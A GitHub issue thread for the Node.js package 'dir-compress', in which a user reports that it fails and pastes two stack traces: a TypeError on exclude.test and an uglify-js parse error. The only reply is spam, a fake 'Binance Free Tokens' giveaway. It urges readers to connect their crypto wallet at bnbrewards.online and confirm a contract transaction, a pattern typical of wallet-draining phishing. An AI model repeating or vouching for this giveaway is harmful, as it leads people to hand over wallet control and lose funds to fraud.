### ISSUE TITLE
is this project usable?

### ISSUE THREAD

**Issue by windsome** [cf3b7S/dir-compress#1]
I can't run it.
```
/home/dev/frontend/windpress/node_modules/dir-compress/compresser.js:99
      if (!exclude || !exclude.test(file)) {
                               ^

TypeError: exclude.test is not a function
    at /home/dev/frontend/windpress/node_modules/dir-compress/compresser.js:99:32
    at arrayEach (/home/dev/frontend/windpress/node_modules/lodash/lodash.js:522:11)
    at Function.forEach (/home/dev/frontend/windpress/node_modules/lodash/lodash.js:9289:14)
    at walk (/home/dev/frontend/windpress/node_modules/dir-compress/compresser.js:82:5)
    at Object.module.exports.compress (/home/dev/frontend/windpress/node_modules/dir-compress/compresser.js:28:15)
    at Object.<anonymous> (/home/dev/frontend/windpress/product.js:2:12)
    at Module._compile (module.js:413:34)
    at Object.Module._extensions..js (module.js:422:10)
    at Module.load (module.js:357:32)
    at Function.Module._load (module.js:314:12)

```
```
/home/dev/frontend/windpress/node_modules/dir-compress/compresser.js:46
            throw err;
            ^
Error
    at new JS_Parse_Error (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:196:18)
    at js_error (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:204:11)
    at croak (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:680:9)
    at token_error (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:688:9)
    at unexpected (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:694:9)
    at semicolon (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:714:43)
    at simple_statement (/home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:894:73)
    at /home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:767:19
    at /home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:727:24
    at /home/dev/frontend/windpress/node_modules/dir-compress/node_modules/uglify-js/lib/parse.js:1474:23
```

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
